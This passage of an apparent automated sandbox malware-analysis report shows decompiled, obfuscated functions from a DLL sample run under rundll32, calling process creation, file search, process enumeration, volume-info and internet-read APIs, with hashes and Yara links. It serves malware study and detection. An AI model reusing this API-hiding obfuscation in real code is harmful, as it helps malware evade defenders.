				ExitProcess(0);
			}

APIs

ExitProcess.KERNEL32(00000000), ref: 100042F1

Memory Dump Source

Source File: 00000006.00000002.362621006.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.362610242.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.362690666.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 11cce549a584f233032fc040f1d8beaa3eb6087a0dfae4806d5bd7ccc63cf562
Instruction ID: dec05fa3737df580d58ff145636bc0451a72c06ba1d5dcadd23311741e886f9d
Opcode Fuzzy Hash: 11cce549a584f233032fc040f1d8beaa3eb6087a0dfae4806d5bd7ccc63cf562
Instruction Fuzzy Hash: B91128B5E00208EBDB44DFE5D94AADEBBF1FB44308F208089E515A7240D7B45B18CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 1001A566, Relevance: 1.5, APIs: 1, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E1001A566(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t31;
				int _t39;

				_push(_a4);
				_push(__ecx);
				E10022523(_t31);
				_v20 = 0xa80c31;
				_v20 = _v20 * 0x6c;
				_v20 = _v20 ^ 0x46e6f799;
				_v16 = 0x35d7e6;
				_v16 = _v16 << 0xd;
				_v16 = _v16 ^ 0xbafefac0;
				_v12 = 0x55f9ae;
				_v12 = _v12 + 0xffffbfa6;
				_v12 = _v12 | 0xf8d2795e;
				_v12 = _v12 ^ 0xf8daa7f9;
				_v8 = 0xe46cfe;
				_v8 = _v8 ^ 0xeb94df75;
				_v8 = _v8 | 0xf69b0666;
				_v8 = _v8 ^ 0xfffa92dc;
				E10002309(0x148, __ecx, __ecx, 0x2237d547, __ecx, 0x9c9047d0);
				_t39 = FindCloseChangeNotification(_a4); // executed
				return _t39;
			}

APIs

FindCloseChangeNotification.KERNEL32(F8DAA7F9), ref: 1001A601

Memory Dump Source

Source File: 00000006.00000002.362621006.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.362610242.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.362690666.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 2512bc8cf98a9556459c8d1695ff192ee3e01f460f93b2f36ca59e351fe401b9
Instruction ID: 916d80f1436c55e495bde87e87ea32654bf5eec04e964754689aa7ec780072d2
Opcode Fuzzy Hash: 2512bc8cf98a9556459c8d1695ff192ee3e01f460f93b2f36ca59e351fe401b9
Instruction Fuzzy Hash: 1F11F3B5C1030DFBCB18DFE8D8869AEBBB4EF44304F108698A855A6261D3B56B158F91

Uniqueness

Uniqueness Score: -1.00%

Function 100117CB, Relevance: 1.3, APIs: 1, Instructions: 56
stringCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E100117CB(WCHAR* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t44;
				int _t55;
				signed int _t57;
				WCHAR* _t62;

				_push(_a8);
				_t62 = __ecx;
				_push(_a4);
				_push(__ecx);
				E10022523(_t44);
				_v24 = _v24 & 0x00000000;
				_v32 = 0x2c5dd9;
				_v28 = 0x29a411;
				_v16 = 0xb6013c;
				_v16 = _v16 >> 2;
				_v16 = _v16 << 5;
				_v16 = _v16 ^ 0x05bceb0d;
				_v12 = 0xa7496a;
				_t57 = 7;
				_v12 = _v12 * 0x55;
				_v12 = _v12 | 0x1a205192;
				_v12 = _v12 ^ 0x3fab9f8f;
				_v8 = 0xf5055a;
				_v8 = _v8 / _t57;
				_v8 = _v8 + 0xa16;
				_v8 = _v8 * 0x7e;
				_v8 = _v8 ^ 0x1132ba81;
				_v20 = 0xaea409;
				_v20 = _v20 << 6;
				_v20 = _v20 ^ 0x2ba3ef66;
				E10002309(0xb8, _t57, _t57, 0xbf157248, _t57, 0x9c9047d0);
				_t55 = lstrcmpiW(_t62, _a8); // executed
				return _t55;
			}

APIs

lstrcmpiW.KERNEL32(?,05BCEB0D,?,?,?,?,?,?,?,?,00000000), ref: 1001188D

Memory Dump Source

Source File: 00000006.00000002.362621006.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.362610242.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.362690666.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
Instruction ID: 1774797ce17004cd69ed458787da8d3b2b53829bebfee28bf73c73f1d8c62a15
Opcode Fuzzy Hash: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
Instruction Fuzzy Hash: 652127B5D0020CFFDB04DFA4D94A9EEBBB4EB44304F108189E425B7240E3B56B049F91

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 6416 Parent PID: 6228 rundll32.exeCOMMON

Executed Functions

Function 100231D2, Relevance: 1.6, APIs: 1, Instructions: 77
processCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E100231D2(void* __ecx, WCHAR* __edx, intOrPtr _a8, intOrPtr _a12, WCHAR* _a16, struct _STARTUPINFOW* _a28, intOrPtr _a32, intOrPtr _a36, struct _PROCESS_INFORMATION* _a48, int _a52, intOrPtr _a56) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				intOrPtr _v28;
				void* _t54;
				int _t63;
				signed int _t65;
				WCHAR* _t71;

				_push(_a56);
				_t71 = __edx;
				_push(_a52);
				_push(_a48);
				_push(0);
				_push(0);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(0);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(__edx);
				E10022523(_t54);
				_v28 = 0x2cec17;
				_v24 = 0;
				_v16 = 0x5aadab;
				_v16 = _v16 << 3;
				_v16 = _v16 >> 0xc;
				_v16 = _v16 ^ 0x000031a8;
				_v12 = 0x82119f;
				_v12 = _v12 >> 2;
				_v12 = _v12 + 0xffff09c3;
				_t65 = 0x25;
				_v12 = _v12 / _t65;
				_v12 = _v12 ^ 0x0004d7f2;
				_v8 = 0x7cd8a6;
				_v8 = _v8 >> 6;
				_v8 = _v8 | 0x702a8e48;
				_v8 = _v8 + 0xffff37f0;
				_v8 = _v8 ^ 0x702d019b;
				_v20 = 0x367fb2;
				_v20 = _v20 + 0xffff7ba2;
				_v20 = _v20 ^ 0x003ae9c9;
				E10002309(0x2e4, _t65, _t65, 0xbf8568a3, _t65, 0x9c9047d0);
				_t63 = CreateProcessW(_t71, _a16, 0, 0, _a52, 0, 0, 0, _a28, _a48); // executed
				return _t63;
			}

APIs

CreateProcessW.KERNELBASE(000C0354,?,00000000,00000000,?,00000000,00000000,00000000,229292B4,?), ref: 100232BB

Memory Dump Source

Source File: 00000007.00000002.366201536.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.366193693.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.366244025.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 1c884f6c38555fd1f2acfe04ef4172838376d53041689723563821acbd5a938d
Instruction ID: db286c9e9bcad3bd2e87b522c53d89c9dfc5ed19f2ace101bae5327955dfaec9
Opcode Fuzzy Hash: 1c884f6c38555fd1f2acfe04ef4172838376d53041689723563821acbd5a938d
Instruction Fuzzy Hash: 21311476801248BBCF65DF96CD49CDFBFB5FB89704F108188F914A6220D3B58A60DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 10004248, Relevance: 1.5, APIs: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10004248() {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _t52;
				signed int _t53;

				_v24 = _v24 & 0x00000000;
				_v32 = 0xac8d12;
				_v28 = 0x59a528;
				_v12 = 0xae5295;
				_v12 = _v12 << 2;
				_t52 = 0xb;
				_v12 = _v12 / _t52;
				_v12 = _v12 ^ 0x0038a8c1;
				_v20 = 0xfd2184;
				_v20 = _v20 ^ 0xb7361747;
				_v20 = _v20 ^ 0xb7cc531f;
				_v8 = 0xac9b8;
				_t53 = 9;
				_v8 = _v8 / _t53;
				_v8 = _v8 << 0xd;
				_v8 = _v8 >> 0xd;
				_v8 = _v8 ^ 0x00077309;
				_v16 = 0x4164cf;
				_v16 = _v16 << 2;
				_v16 = _v16 ^ 0x010bebe7;
				E10002309(0x37f, _t53, _t53, 0x8b1a77d6, _t53, 0x9c9047d0);
				ExitProcess(0);
			}

APIs

ExitProcess.KERNEL32(00000000), ref: 100042F1

Memory Dump Source

Source File: 00000007.00000002.366201536.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.366193693.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.366244025.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 11cce549a584f233032fc040f1d8beaa3eb6087a0dfae4806d5bd7ccc63cf562
Instruction ID: dec05fa3737df580d58ff145636bc0451a72c06ba1d5dcadd23311741e886f9d
Opcode Fuzzy Hash: 11cce549a584f233032fc040f1d8beaa3eb6087a0dfae4806d5bd7ccc63cf562
Instruction Fuzzy Hash: B91128B5E00208EBDB44DFE5D94AADEBBF1FB44308F208089E515A7240D7B45B18CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 100117CB, Relevance: 1.3, APIs: 1, Instructions: 56
stringCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E100117CB(WCHAR* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t44;
				int _t55;
				signed int _t57;
				WCHAR* _t62;

				_push(_a8);
				_t62 = __ecx;
				_push(_a4);
				_push(__ecx);
				E10022523(_t44);
				_v24 = _v24 & 0x00000000;
				_v32 = 0x2c5dd9;
				_v28 = 0x29a411;
				_v16 = 0xb6013c;
				_v16 = _v16 >> 2;
				_v16 = _v16 << 5;
				_v16 = _v16 ^ 0x05bceb0d;
				_v12 = 0xa7496a;
				_t57 = 7;
				_v12 = _v12 * 0x55;
				_v12 = _v12 | 0x1a205192;
				_v12 = _v12 ^ 0x3fab9f8f;
				_v8 = 0xf5055a;
				_v8 = _v8 / _t57;
				_v8 = _v8 + 0xa16;
				_v8 = _v8 * 0x7e;
				_v8 = _v8 ^ 0x1132ba81;
				_v20 = 0xaea409;
				_v20 = _v20 << 6;
				_v20 = _v20 ^ 0x2ba3ef66;
				E10002309(0xb8, _t57, _t57, 0xbf157248, _t57, 0x9c9047d0);
				_t55 = lstrcmpiW(_t62, _a8); // executed
				return _t55;
			}

APIs

lstrcmpiW.KERNELBASE(?,05BCEB0D,?,?,?,?,?,?,?,?,00000000), ref: 1001188D

Memory Dump Source

Source File: 00000007.00000002.366201536.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.366193693.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.366244025.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
Instruction ID: 1774797ce17004cd69ed458787da8d3b2b53829bebfee28bf73c73f1d8c62a15
Opcode Fuzzy Hash: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
Instruction Fuzzy Hash: 652127B5D0020CFFDB04DFA4D94A9EEBBB4EB44304F108189E425B7240E3B56B049F91

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 6376 Parent PID: 6416 rundll32.exeCOMMON

Executed Functions

Function 10011A80, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62
fileCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E10011A80(void* __ecx, struct _WIN32_FIND_DATAW* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, WCHAR* _a16) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _v32;
				intOrPtr _v36;
				void* _t44;
				void* _t55;
				signed int _t57;
				struct _WIN32_FIND_DATAW* _t63;

				_push(_a16);
				_t63 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E10022523(_t44);
				_v36 = 0x40784c;
				asm("stosd");
				asm("stosd");
				_t57 = 0x66;
				asm("stosd");
				_v8 = 0xc58147;
				_v8 = _v8 / _t57;
				_v8 = _v8 >> 6;
				_v8 = _v8 + 0xffff0e61;
				_v8 = _v8 ^ 0xffff2899;
				_v16 = 0x3eee0f;
				_v16 = _v16 ^ 0xf4098113;
				_v16 = _v16 * 0x76;
				_v16 = _v16 ^ 0x918df00d;
				_v12 = 0x61adbd;
				_v12 = _v12 | 0x1ce5c3f2;
				_v12 = _v12 ^ 0x5ce6c57a;
				_v12 = _v12 ^ 0x400dc737;
				_v20 = 0x919b51;
				_v20 = _v20 + 0x9c69;
				_v20 = _v20 ^ 0x00927a19;
				E10002309(0x352, _t57, _t57, 0x810611c3, _t57, 0x9c9047d0);
				_t55 = FindFirstFileW(_a16, _t63); // executed
				return _t55;
			}

0x10011a88
0x10011a8b
0x10011a8d
0x10011a90
0x10011a93
0x10011a96
0x10011a98
0x10011a9d
0x10011aac
0x10011ab1
0x10011ab2
0x10011ab9
0x10011aba
0x10011acb
0x10011ace
0x10011ad2
0x10011ad9
0x10011ae0
0x10011ae7
0x10011af9
0x10011afc
0x10011b03
0x10011b0a
0x10011b11
0x10011b18
0x10011b1f
0x10011b26
0x10011b2d
0x10011b40
0x10011b4c
0x10011b53

APIs

FindFirstFileW.KERNEL32(1000CC4B,?,?,?,?,?,?,?,?,?,?,09AB8BF6,00000072), ref: 10011B4C

Strings

Lx@, xrefs: 10011A9D

Memory Dump Source

Source File: 00000008.00000002.879826400.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.879795728.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.879874908.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: FileFindFirst
String ID: Lx@
API String ID: 1974802433-402333656
Opcode ID: 36fdb602463615d85640dee2202416375b56d64be84a9f72e6469216861f4ee0
Instruction ID: 4c909c8dcac535ec2e4d3c8be887b4ad64c8f6e64b414c256e7081c5313808d4
Opcode Fuzzy Hash: 36fdb602463615d85640dee2202416375b56d64be84a9f72e6469216861f4ee0
Instruction Fuzzy Hash: B1212575D01219FBEB18CFA5DC4A9DEBFB5FB44300F008199E811A6260D3B59B54DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 10021027, Relevance: 1.6, APIs: 1, Instructions: 57
filenetworkCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E10021027(void* __ecx, void* __edx, intOrPtr _a4, void* _a8, long _a12, intOrPtr _a16, intOrPtr _a20, DWORD* _a24) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _t46;
				int _t55;
				signed int _t57;
				void* _t62;

				_push(_a24);
				_t62 = __ecx;
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E10022523(_t46);
				_v12 = 0xd4e775;
				_v12 = _v12 ^ 0x9fa1d679;
				_v12 = _v12 + 0xffffd43b;
				_v12 = _v12 >> 0xf;
				_v12 = _v12 ^ 0x000b9d33;
				_v20 = 0xb1fd06;
				_v20 = _v20 + 0xffff1766;
				_v20 = _v20 ^ 0x00bd550d;
				_v16 = 0x2d7499;
				_v16 = _v16 << 0x10;
				_v16 = _v16 ^ 0x749af706;
				_v8 = 0x5dfa4b;
				_t57 = 0x11;
				_v8 = _v8 / _t57;
				_v8 = _v8 >> 0x10;
				_v8 = _v8 | 0xef9b7d02;
				_v8 = _v8 ^ 0xef9457ed;
				E10002309(0x254, _t57, _t57, 0xf677e454, _t57, 0xc0cf1a4);
				_t55 = InternetReadFile(_t62, _a8, _a12, _a24); // executed
				return _t55;
			}

0x1002102e
0x10021031
0x10021033
0x10021036
0x10021039
0x1002103c
0x1002103f
0x10021043
0x10021044
0x10021049
0x10021053
0x1002105c
0x10021063
0x10021067
0x1002106e
0x10021075
0x1002107c
0x10021083
0x1002108a
0x1002108e
0x10021095
0x100210a1
0x100210a9
0x100210ac
0x100210b0
0x100210b7
0x100210d7
0x100210e9
0x100210ef

APIs

InternetReadFile.WININET(?,749AF706,00BD550D,?), ref: 100210E9

Memory Dump Source

Source File: 00000008.00000002.879826400.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.879795728.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.879874908.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: FileInternetRead
String ID:
API String ID: 778332206-0
Opcode ID: 2d4f4d84a63d0f13ac273aada7b35ede13ebed0102486743890e3910fc006acb
Instruction ID: 23d0799d30c03751676f61c09586855f1f5435a61959109e3edcdfa144fe7809
Opcode Fuzzy Hash: 2d4f4d84a63d0f13ac273aada7b35ede13ebed0102486743890e3910fc006acb
Instruction Fuzzy Hash: 8A2113B6D00209FBDF06DFE4C94A8EEBBB1EF44300F508189F92566251E3B55B61EB91

Uniqueness

Uniqueness Score: -1.00%

Function 10011B54, Relevance: 1.5, APIs: 1, Instructions: 47
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10011B54(int _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t51;
				signed int _t52;

				_v24 = _v24 & 0x00000000;
				_v36 = 0x604094;
				_v32 = 0x94e455;
				_v28 = 0xad6ab3;
				_v8 = 0x1f2344;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 << 0xe;
				_t52 = 0x3c;
				_v8 = _v8 * 0x16;
				_v8 = _v8 ^ 0x0ab2d5aa;
				_v20 = 0xb8d8f1;
				_v20 = _v20 ^ 0x9bb5e2ea;
				_v20 = _v20 ^ 0x9b0a37ea;
				_v16 = 0x527695;
				_v16 = _v16 << 1;
				_v16 = _v16 / _t52;
				_v16 = _v16 ^ 0x000d80fe;
				_v12 = 0xedaf67;
				_v12 = _v12 ^ 0xb485e6d8;
				_v12 = _v12 + 0xffff9be0;
				_v12 = _v12 ^ 0xb46ea43d;
				E10002309(0x190, _t52, _t52, 0xbde7009f, _t52, 0x9c9047d0);
				_t51 = CreateToolhelp32Snapshot(_a4, 0); // executed
				return _t51;
			}

0x10011b5a
0x10011b60
0x10011b67
0x10011b6e
0x10011b75
0x10011b7c
0x10011b80
0x10011b8a
0x10011b91
0x10011b94
0x10011b9b
0x10011ba2
0x10011ba9
0x10011bb0
0x10011bb7
0x10011bc4
0x10011bc7
0x10011bce
0x10011bd5
0x10011bdc
0x10011be3
0x10011bfd
0x10011c0a
0x10011c0f

APIs

CreateToolhelp32Snapshot.KERNEL32(B46EA43D,00000000), ref: 10011C0A

Memory Dump Source

Source File: 00000008.00000002.879826400.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.879795728.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.879874908.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: CreateSnapshotToolhelp32
String ID:
API String ID: 3332741929-0
Opcode ID: 8dbd4dee2a96a2a279b30488413906bed3e520bcc45b322a8894c97035d3b5c6
Instruction ID: 9081da046f3271a085e2fa5fb81bd71d4906930810acfb0f456372ca571504a1
Opcode Fuzzy Hash: 8dbd4dee2a96a2a279b30488413906bed3e520bcc45b322a8894c97035d3b5c6
Instruction Fuzzy Hash: 8B11F3B1D0520CEBDB18DFA8C94A6AEBBB0FF44304F108199E521B72A0D7B56B04DF50

Uniqueness

Uniqueness Score: -1.00%

Function 100054DA, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 57
networkCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E100054DA(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t52;
				int _t63;
				signed int _t65;
				signed int _t66;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E10022523(_t52);
				_v24 = _v24 & 0x00000000;
				_v28 = 0x6eade3;
				_v20 = 0x70ee4c;
				_v20 = _v20 + 0xffffd19f;
				_v20 = _v20 ^ 0x007528c6;
				_v16 = 0x80bb49;
				_v16 = _v16 + 0xffff2cb2;
				_v16 = _v16 >> 4;
				_t65 = 0x3d;
				_v16 = _v16 / _t65;
				_v16 = _v16 ^ 0x000cd3d3;
				_v12 = 0x49bca9;
				_v12 = _v12 + 0x284b;
				_v12 = _v12 + 0x352d;
				_v12 = _v12 ^ 0x5aa1db04;
				_v12 = _v12 ^ 0x5aee1bd2;
				_v8 = 0xbb5f19;
				_v8 = _v8 << 9;
				_v8 = _v8 | 0x616a7bee;
				_t39 =  &_v8; // 0x616a7bee
				_t66 = 0x5f;
				_v8 =  *_t39 / _t66;
				_v8 = _v8 ^ 0x01468cd5;
				E10002309(_t66 + 0x22, _t66, _t66, 0x1d483158, _t66, 0xc0cf1a4);
				_t63 = InternetCloseHandle(_a12); // executed
				return _t63;
			}

0x100054e0
0x100054e3
0x100054e6
0x100054eb
0x100054f0
0x100054f7
0x10005500
0x10005507
0x1000550e
0x10005515
0x1000551c
0x10005523
0x1000552c
0x10005531
0x10005536
0x1000553d
0x10005544
0x1000554b
0x10005552
0x10005559
0x10005560
0x10005567
0x1000556b
0x10005572
0x10005575
0x1000557d
0x10005580
0x1000559e
0x100055a9
0x100055ae

APIs

InternetCloseHandle.WININET(007528C6), ref: 100055A9

Strings

Lp, xrefs: 10005500
-5, xrefs: 1000554B
{ja, xrefs: 10005572

Memory Dump Source

Source File: 00000008.00000002.879826400.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.879795728.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.879874908.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: CloseHandleInternet
String ID: -5$Lp${ja
API String ID: 1081599783-1222928185
Opcode ID: 96c25ca98efac3a213f8ce2c5c378593396d62ac674d19cb573e17f5676fb90f
Instruction ID: e6c55e4df9d10131ec682d11da997c923e435672ca5001c5aadfd6cedd8f9d11
Opcode Fuzzy Hash: 96c25ca98efac3a213f8ce2c5c378593396d62ac674d19cb573e17f5676fb90f
Instruction Fuzzy Hash: 4B2104B6D0120DFBEF04CFE5C94AAAEBBB1FB10314F108199E420A6251E3B95B14CF91

Uniqueness

Uniqueness Score: -1.00%

Function 1001F606, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E1001F606(void* __ecx, void* __edx, struct tagPROCESSENTRY32W* _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				void* _t43;
				void* _t50;
				void* _t54;

				_push(_a8);
				_t54 = __edx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10022523(_t43);
				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v32 = 0xf33a94;
				_v8 = 0x16e1c5;
				_v8 = _v8 << 0x10;
				_v8 = _v8 + 0xffff7501;
				_v8 = _v8 * 0x3d;
				_v8 = _v8 ^ 0xcbc2f299;
				_v20 = 0x18380a;
				_v20 = _v20 + 0x556a;
				_v20 = _v20 ^ 0x2e444359;
				_v20 = _v20 ^ 0x2e5734c8;
				_v16 = 0x1de0f;
				_v16 = _v16 + 0xffff3d0f;
				_v16 = _v16 ^ 0x5b4c4104;
				_v16 = _v16 ^ 0x5b45396c;
				_v12 = 0x8d2c67;
				_v12 = _v12 | 0x6bb36e73;
				_v12 = _v12 ^ 0x44de99d4;
				_v12 = _v12 ^ 0x2f6e43e4;
				_t50 = E10002309(0x343, __ecx, __ecx, 0x1a63a552, __ecx, 0x9c9047d0);
				Process32FirstW(_t54, _a4); // executed
				return _t50;
			}

0x1001f60d
0x1001f610
0x1001f612
0x1001f615
0x1001f616
0x1001f617
0x1001f61c
0x1001f623
0x1001f627
0x1001f62e
0x1001f635
0x1001f639
0x1001f650
0x1001f653
0x1001f65a
0x1001f661
0x1001f668
0x1001f66f
0x1001f676
0x1001f67d
0x1001f684
0x1001f68b
0x1001f692
0x1001f699
0x1001f6a0
0x1001f6a7
0x1001f6c0
0x1001f6cc
0x1001f6d2

APIs

Process32FirstW.KERNEL32(00000000,2F6E43E4,?,?,?,?,?,?,?,?,00000000), ref: 1001F6CC

Strings

YCD., xrefs: 1001F668
Cn/, xrefs: 1001F6A7
l9E[, xrefs: 1001F68B

Memory Dump Source

Source File: 00000008.00000002.879826400.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.879795728.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.879874908.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: FirstProcess32
String ID: YCD.$l9E[$Cn/
API String ID: 2623510744-4191728293
Opcode ID: ba6908419aca7e40de5752100cf2159fdf1c013576c21fa5a45c6b552e88f8aa
Instruction ID: e259f347f79b612dfbf7f188fd4e3a77e73ae6d79840be04f149529e315639f7
Opcode Fuzzy Hash: ba6908419aca7e40de5752100cf2159fdf1c013576c21fa5a45c6b552e88f8aa
Instruction Fuzzy Hash: 802133BAC01219EBCF08CFE4E98A9AEBBB4FF10715F108689E415B6211D3745B10DF91

Uniqueness

Uniqueness Score: -1.00%

Function 1001A809, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E1001A809(DWORD* __ecx, void* __edx, intOrPtr _a12, WCHAR* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				WCHAR* _v24;
				WCHAR* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t45;
				int _t55;
				DWORD* _t60;

				_t60 = __ecx;
				_push(0);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(0);
				_push(0);
				_push(__ecx);
				E10022523(_t45);
				_v36 = 0x72e62c;
				_v32 = 0x6afee3;
				_v28 = 0;
				_v24 = 0;
				_v12 = 0x241442;
				_v12 = _v12 ^ 0x5f0a7563;
				_v12 = _v12 * 0x4b;
				_v12 = _v12 + 0xffff00d5;
				_v12 = _v12 ^ 0xe298fffa;
				_v20 = 0x629ccf;
				_v20 = _v20 + 0xa262;
				_v20 = _v20 ^ 0x006504c5;
				_v8 = 0x8dfd52;
				_v8 = _v8 * 0x5f;
				_v8 = _v8 >> 0xe;
				_v8 = _v8 << 0xd;
				_v8 = _v8 ^ 0x1a5bea6c;
				_v16 = 0x13a484;
				_v16 = _v16 * 0x42;
				_v16 = _v16 ^ 0x051e7b21;
				E10002309(0x1c8, __ecx, __ecx, 0xfc0d3d9c, __ecx, 0x9c9047d0);
				_t55 = GetVolumeInformationW(_a16, 0, 0, _t60, 0, 0, 0, 0); // executed
				return _t55;
			}

0x1001a813
0x1001a815
0x1001a816
0x1001a817
0x1001a81a
0x1001a81d
0x1001a81e
0x1001a81f
0x1001a822
0x1001a825
0x1001a828
0x1001a82b
0x1001a82e
0x1001a82f
0x1001a831
0x1001a832
0x1001a837
0x1001a841
0x1001a848
0x1001a84b
0x1001a84e
0x1001a855
0x1001a86c
0x1001a86f
0x1001a876
0x1001a87d
0x1001a884
0x1001a88b
0x1001a892
0x1001a8a3
0x1001a8a6
0x1001a8aa
0x1001a8ae
0x1001a8b5
0x1001a8c0
0x1001a8c3
0x1001a8d6
0x1001a8e8
0x1001a8ef

APIs

GetVolumeInformationW.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 1001A8E8

Strings

,r, xrefs: 1001A837
cu_, xrefs: 1001A855

Memory Dump Source

Source File: 00000008.00000002.879826400.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.879795728.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.879874908.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: InformationVolume
String ID: ,r$cu_
API String ID: 2039140958-355032270
Opcode ID: 11f0a768391377fe69868ce35b1527178b61e9fcd2d284546a7f3ae16540a2da
Instruction ID: 2d9077e8843d46ea74a564eef62e93d3853f66a41997d5942974fc7a547dbb6c
